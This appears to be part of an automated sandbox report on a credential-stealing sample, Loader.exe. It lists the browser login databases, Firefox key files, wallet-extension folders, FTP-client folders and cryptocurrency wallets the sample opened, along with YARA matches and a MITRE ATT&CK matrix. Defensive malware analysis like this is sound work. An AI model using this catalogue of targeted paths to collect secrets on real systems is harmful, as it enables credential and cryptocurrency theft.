                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\user\Desktop\Loader.exe | Directory queried: C:\Users\user\Documents\BJZFPPWAPT
                Source: C:\Users\user\Desktop\Loader.exe | Directory queried: C:\Users\user\Documents\BNAGMGSPLO
                Source: C:\Users\user\Desktop\Loader.exe | Directory queried: C:\Users\user\Documents\DUUDTUBZFW
                Source: C:\Users\user\Desktop\Loader.exe | Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\Loader.exe | Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
                Source: C:\Users\user\Desktop\Loader.exe | Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
                Source: C:\Users\user\Desktop\Loader.exe | Directory queried: C:\Users\user\Documents\LFOPODGVOH
                Source: C:\Users\user\Desktop\Loader.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
                Source: C:\Users\user\Desktop\Loader.exe | Directory queried: C:\Users\user\Documents\PIVFAGEAAV
                Source: C:\Users\user\Desktop\Loader.exe | Directory queried: C:\Users\user\Documents\QCFWYSKMHA
                Source: C:\Users\user\Desktop\Loader.exe | Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
                Source: C:\Users\user\Desktop\Loader.exe | Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
                Source: C:\Users\user\Desktop\Loader.exe | Directory queried: C:\Users\user\Documents\GIGIYTFFYT
                Source: C:\Users\user\Desktop\Loader.exe | Directory queried: number of queries: 1001
                Source: Yara match | File source: 00000002.00000003.1587677507.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000003.1620380906.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000003.1620222186.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000003.1587467310.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Loader.exe PID: 7788, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: Process Memory Space: Loader.exe PID: 7788, type: MEMORYSTR
                Source: Yara match | File source: 2.2.Loader.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.Loader.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.2665491875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                MITRE ATT&CK Matrix (numbers before a technique name are the report's signature counts for that technique)

                | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 211 Process Injection | 22 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                | Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 211 Process Injection | LSASS Memory | 241 Security Software Discovery | Remote Desktop Protocol | 41 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
                | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 22 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction |
                | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Software Packing | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 21 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 33 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
